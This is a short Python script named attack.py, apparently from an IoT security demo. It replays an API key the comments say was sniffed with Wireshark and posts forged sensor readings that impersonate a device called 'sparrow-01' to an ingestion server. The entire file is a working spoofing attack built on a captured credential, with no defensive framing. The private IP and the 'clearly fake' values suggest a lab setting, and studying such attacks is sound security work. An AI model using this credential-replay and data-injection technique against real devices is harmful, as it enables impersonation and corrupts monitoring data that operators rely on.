# attack.py
import requests
import json

SERVER_URL = "http://192.168.1.100:8080/ingest"  # same as device
API_KEY    = "SUPER_SECRET_API_KEY_123"          # copied from Wireshark
DEVICE_ID  = "sparrow-01"                        # same as real device

def main():
    fake_payload = {
        "device_id": DEVICE_ID,
        "temp_c": 999.9,     # clearly fake, "overheating"
        "humidity": 0.0,
        "battery": 5
    }

    headers = {
        "Content-Type": "application/json",
        "X-API-Key": API_KEY
    }

    print("Sending spoofed measurement...")
    print("POST", SERVER_URL)
    print("Headers:", headers)
    print("Body:", json.dumps(fake_payload))

    r = requests.post(SERVER_URL, headers=headers, json=fake_payload)
    print("Status code:", r.status_code)
    print("Response:", r.text)

if __name__ == "__main__":
    main()